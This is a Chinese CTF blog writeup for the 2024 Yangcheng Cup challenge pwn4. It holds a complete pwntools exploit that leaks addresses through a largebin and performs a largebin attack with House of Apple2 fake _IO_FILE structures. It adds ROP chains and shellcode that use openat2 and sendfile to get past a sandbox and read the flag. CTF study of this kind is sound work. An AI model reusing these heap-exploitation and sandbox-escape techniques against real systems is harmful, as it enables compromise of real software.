羊城杯2024 pwn4

于 2024-08-29 23:44:15 发布
阅读量209 收藏 3
点赞数 4
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79327647/article/details/141690944
版权

前言

军训期间写题目实在是难崩,感觉能出的pwn4结果实在是没时间去搞(也有可能是我太菜了),赛后还被负责本次出题的学长贺师傅教育了一下,多练多练。

个人感觉题目还行,虽然版本高一些,但是漏洞也很致命,只是magic_gradget不太好找了,没办法,好用的gadget是基于汇编上的,很容易就被修复,回顾我学的house系列,例如house_of_cat等中rdx都是编译级别的利用方式,可以很容易被修复,或者编译器发生变化也可能不再能使用。

高版本的glibc真的难啊。

思路

将一个堆块放入largbin就可以泄露出libcbase和heapbase,后面直接largbin attack就可以愉快house of apple2了至于开的沙箱可以使用openat2去绕过,也是很方便。

exp:

from pwn import *
from pwncli import *
from pwn_std import *

context(os='linux', arch='amd64', log_level='debug')
p = getProcess("139.155.126.78", "38645", "./pwn")
elf = ELF("./pwn")
libc = ELF("/home/mazhatter/glibc-all-in-one/libs/2.36-0ubuntu4_amd64/libc.so.6")
'''
patchelf --set-interpreter /opt/libs/2.27-3ubuntu1_amd64/ld-2.27.so ./patchelf
patchelf --replace-needed libc.so.6 /opt/libs/2.27-3ubuntu1_amd64/libc-2.27.so ./patchelf
ROPgadget --binary main --only "pop|ret" | grep rdi
set debug-file-directory /home/mazhatter/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/.debug/
'''

def choose(num):
    sla(b'>',str(num))
def add(index,size):
    choose(1)
    sla(b'Index: ',str(index))
    sla(b'Size: ',str(size))
def delete(index):
    choose(2)
    sla(b'Index: ',str(index))
def edit(index,content):
    choose(3)
    sla(b'Index: ',str(index))
    sla(b'Content: ',content)
def show(index):
    choose(4)
    sla(b'Index: ',str(index))

add(0,0x520)
add(1,0x518)
add(2,0x500)
add(3,0x510)
delete(0)
add(4,0x550)

show(0)
print("__malloc_hook=",hex(libc.sym["__malloc_hook"]))
libc_base=uu64(ru('\x7f'))-0x1f70f0
edit(0,b'a'*0x10)
show(0)

heap_base=uu64(ru('\x55')[-6:])-0x20a
print("libc_base=",hex(libc_base))
print("heap_base=",hex(heap_base))
edit(0,p64(libc_base+0x1f70f0)*2+p64(heap_base+0x5575468e9f7a-0x5575468ea000+0x290)+p64(libc_base+libc.sym["_IO_list_all"]-0x20))



open_addr = libc_base + libc.sym['open']
read_addr = libc_base + libc.sym['read']
write_addr = libc_base + libc.sym['write']
syscall_addr=libc_base+0x91316
_IO_wfile_jumps = libc.sym._IO_wfile_jumps
pop_rdi=libc_base+0x0000000000023b65
pop_rdx=libc_base+0x0000000000166262
pop_rsi=libc_base+0x00000000000251be
pop_rax=libc_base+0x000000000003fa43
'''
mazhatter@ASUA:~/CTF/pwn/pwn_赛事/羊城杯/tempdir$ ROPgadget --binary /home/mazhatter/glibc-all-in-one/libs/2.36-0ubuntu4_amd64/libc.so.6 --only "pop|ret" | grep rdi
0x0000000000023e75 : pop rdi ; pop rbp ; ret
0x0000000000023b65 : pop rdi ; ret
mazhatter@ASUA:~/CTF/pwn/pwn_赛事/羊城杯/tempdir$ ROPgadget --binary /home/mazhatter/glibc-all-in-one/libs/2.36-0ubuntu4_amd64/libc.so.6 --only "pop|ret" | grep rdx
0x000000000008bcd8 : pop rax ; pop rdx ; pop rbx ; ret
0x000000000008bcd9 : pop rdx ; pop rbx ; ret
0x0000000000101353 : pop rdx ; pop rcx ; pop rbx ; ret
0x0000000000166262 : pop rdx ; ret
mazhatter@ASUA:~/CTF/pwn/pwn_赛事/羊城杯/tempdir$ ROPgadget --binary /home/mazhatter/glibc-all-in-one/libs/2.36-0ubuntu4_amd64/libc.so.6 --only "pop|ret" | grep rsi
0x0000000000023e73 : pop rsi ; pop r15 ; pop rbp ; ret
0x0000000000023b63 : pop rsi ; pop r15 ; ret
0x00000000000251be : pop rsi ; ret
0x00000000000472ee : pop rsi ; ret 0xfffe
mazhatter@ASUA:~/CTF/pwn/pwn_赛事/羊城杯/tempdir$ ROPgadget --binary /home/mazhatter/glibc-all-in-one/libs/2.36-0ubuntu4_amd64/libc.so.6 --only "pop|ret" | grep rax
0x000000000003f822 : pop rax ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; ret
0x0000000000140588 : pop rax ; pop rbx ; pop rbp ; ret
0x000000000008bcd8 : pop rax ; pop rdx ; pop rbx ; ret
0x000000000003fa43 : pop rax ; ret
0x000000000002e104 : pop rax ; ret 0x18
'''


fake_IO_wide_data=flat({
    0x0:[pop_rdi,#pop rdi
        heap_base+0x5626d7c3b950- 0x5626d7c39000,
        libc_base+0x000000000002be51,#0x000000000002be51 : pop rsi ; ret
        0,##
        libc_base+0x0000000000108b03,#libc_base+0x000000000011f2e7,#0x000000000011f2e7 : pop rdx ; pop r12 ; ret
        0,
        0,##
        0,
        libc_base+0x0000000000045eb0,#0x0000000000045eb0 : pop rax ; ret
        2,
        libc_base+libc.sym["syscall"]+27,
        libc_base+0x000000000002a3e5,#pop rdi
        3,
        libc_base+0x000000000002be51,#0x000000000002be51 : pop rsi ; ret,
        heap_base+0x5626d7c3b950- 0x5626d7c39000,
        libc_base+0x000000000011f2e7,#0x000000000011f2e7 : pop rdx ; pop r12 ; ret,
        0x100,
        0,
        read_addr,
        libc_base+0x000000000002a3e5,#pop rdi,
        1,
        write_addr,],
    0xb0:0,
    0xb8:0,
    0xc0:0,
    0xc8:0,
    0xd0:0,
    0xd8:0,
    0xe0:0x558f4c7b1ea0- 0x558f4c7b1000+heap_base,
    0xe8:[p64(0)*6,p64(heap_base+0xf10)],
    0x148:libc_base+0x0000000000160e56
})

fake_IO_FILE=flat({
    0x0:0,  #_IO_read_end
    0x8:0,  #_IO_read_base
    0x10:0,  #_IO_write_base
    0x18:0,  #_IO_write_ptr
    0x20:0,  #_IO_write_end
    0x28:0,  #_IO_buf_base
    0x30:0,  #_IO_buf_end
    0x38:0,  #_IO_save_base
    0x40:0,  #_IO_backup_base
    0x48:0,#_IO_save_end
    0x50:0,  #_markers
    0x58:0,  #_chain
    0x60:0,  #_fileno
    0x68:0,  #_old_offset
    0x70:0,  #_cur_column
    0x78:0,  #_lock
    0x80:0,  #_offset
    0x88:0,  #_codecvt
    0x90:0x559123894dc0-0x559123894000+heap_base,  #_wide_data
    0x98:0,  #_freeres_list
    0xa0:0,  #_freeres_buf
    0xa8:0,  #__pad5
    0xb0:0,  #_mode
    0xc8:_IO_wfile_jumps+libc_base,#vtable

})
edit(1,b'./flag\x00\x00'+p64(0)*0xa1+p64(heap_base+0xf10))
payload3=p64(libc_base+0x00000000000233d1)*1+p64(libc_base+0x00000000000251bd)+p64(100)+p64(libc_base+0x00000000000251bd)+p64(libc_base+0x0000000000054990)+p64(pop_rdi)+p64(heap_base)+p64(pop_rsi)+p64(0x3000)+p64(pop_rdx)+p64(7)+p64(libc_base+libc.sym["mprotect"])

payload4=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(heap_base+0x1000)+p64(pop_rdx)+p64(0x100)+p64(read_addr)
payload4+=p64(heap_base+0x1000)#read函数返回地址

shell='''
    mov rax, 0x67616c662f2e
    push rax
    xor rdi, rdi
    sub rdi, 100
    mov rsi, rsp
    push 0
    push 0
    push 0
    mov rdx, rsp
    mov r10, 0x18
    push 437
    pop rax
    syscall

'''

shell += shellcraft.sendfile(1,3,0,50)
edit(2,fake_IO_FILE+fake_IO_wide_data+payload3+payload4)

delete(2)
add(5,0x550)
gdbbug()
sla(b'>',str(5))
pause()
sd(asm(shell))
ita()

Mazhatter
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2022羊城pwn wp
N1rvana的博客
09-04 891
2022羊城pwn
2021羊城pwn部分wp
eeeeeight的博客
09-12 6506
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
羊城2023 pwn-arrary_index_bank
sagic的博客
07-19 329
存在整数溢出,不可以直接改地址,因为super_ai的返回地址一定比v1高所为不行。会等于0x38呢,因为7*8产生了进位所以4被64位舍弃。程序中含有system函数初步判定可能为ret2text。地址因为是十进制所以进行转换查看是否泄漏成功。地址已经泄漏完成开始payload的搭建。cmp操作进行完比较相同为0不相同为1。接收地址-super_ai的返回地址。考虑堆栈平衡 + 0x1315。发现RAX已经变成负数。泄漏地址为rbp下一位。如何进行整数溢出呢?
2023羊城决赛 pwn
qq_62172019的博客
09-18 375
因为库版本是2.23没有对top块大小做检查所以可以正应了题目的名字(house of force)发现第一次申请一个巨大的块泄露地址,第二次可以申请小于0x30的堆块修改top块的大小。第三次申请把malloc_got拿出来写上system第四次申请就成功getshell。注意:直接覆盖成后门地址会因为对齐出问题所以应该跳过push命令以后。没有开pie 堆地址存在固定位置上可以使用unlink攻击。-7的位置上面存在函数返回地址。成功getshell。成功getshell。成功getshell。
强网2022 pwn 赛题解析.docx
12-18
【强网2022 Pwn赛题解析】 在网络安全竞赛“强网”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
2023 羊城 pwn
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出...
安恒pwn1
04-25
"安恒pwn1" 本文主要讨论的是安恒pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8426
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
安全面试常见问题任意文件下载
persist213的博客
08-24 740
吉祥知识星球《网安面试指南》《Java代码审计》《Web安全》《应急响应》《护网资料库》
经验笔记:Token、Session、Cookie 及密码级别安全存储
最新发布
qq_45831414的博客
08-28 331
在用户通过身份验证后,服务器会生成一个Token并发给客户端,之后客户端会在每次请求中附带此Token以证明身份。当用户开始与Web应用互动时,服务器会创建一个唯一的Session ID,并将其存储在客户端的Cookie中。本文将探讨如何利用Token、Session 和 Cookie 这三个概念来实现安全的用户认证及会话管理,并重点介绍如何存储密码以达到最高级别的安全性。综合运用Token、Session 和 Cookie,结合安全的密码存储技术,能够显著提高Web应用的安全性和用户体验。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 366
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
终端防火墙软件功能 | 在终端设备上启用防火墙!终端安全小课堂开讲啦
2401_86434954的博客
08-24 550
终端设备的安全性直接关系到企业的整体网络安全,随着网络威胁的日益复杂和多样化,启用并合理配置终端防火墙软件是保障终端安全不可或缺的一环。今天,我们将走进终端安全小课堂,详细解析中的防火墙功能,为您揭开其保护终端安全的神秘面纱。
你的软件系统安全
温故而知新
08-22 989
如果你的软件系统可以通过网络访问, 可以由多人操作, 可以访问或操作敏感数据, 或者可能暴露隐私, 等等, 请一定要保护你的系统. 那么你的软件系统安全吗? 一. 先问自己如下 4 个问题 1. What are we working on? 我们的系统在干啥? 例如电商系统: 我们在卖啥? 提供什么售前和售后服务? 用户和帐备信息怎么管理的? 数据是如何防护和归档的? 等等 2. What ...
云等保安全合规解决方案
bocco的博客
08-23 426
在此背景下,云等保(云安全等级保护)安全合规解决方案应运而生,旨在为企业构建一套全面、高效、符合国家安全标准的云安全防护体系。通过构建全面、高效、符合国家安全标准的云安全防护体系,企业不仅能够有效应对云环境中的安全挑战,还能够提升业务竞争力,实现可持续发展。它要求云服务提供商和云租户按照不同的安全等级,采取相应的安全控制措施,确保云环境中的数据、应用及基础设施免受未经授权的访问、使用、泄露、中断、破坏等安全威胁。1. 提升安全性:通过实施云等保,企业能够构建更加安全、可靠的云环境,有效抵御各类安全威胁。
DNS部署与安全
m0_64827698的博客
08-28 954
子域 二级域 顶级域 根域。本地域名服务器(代替主机迭代)去找根域名服务器——>...服务器——>权威服务 客户端。特定服务 公司或组织的名称 公司/国家/...(网站性质或地域)DNS缓存投毒(改映射)、DNS放大攻击(分布拒绝服务DDOS)、子域名劫持。主机找网关(本地域名服务器) 客户端。DNS查询(小数据包,要求速度快),www通常指公司网站的主服务器。
HSE软件组件有哪些?如何实现HSE与主机的通信(同步/异步)?如何使用HSE提供的安全服务?
车载系统攻城狮
08-28 567
从软件组成和接口的使用上对HSE做了更进一步的阐述,消息单元MU在实现主机与HSE的通信过程中扮演着重要的角色,最后给出使用HSE服务的示例,包括同步方式和异步方式!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值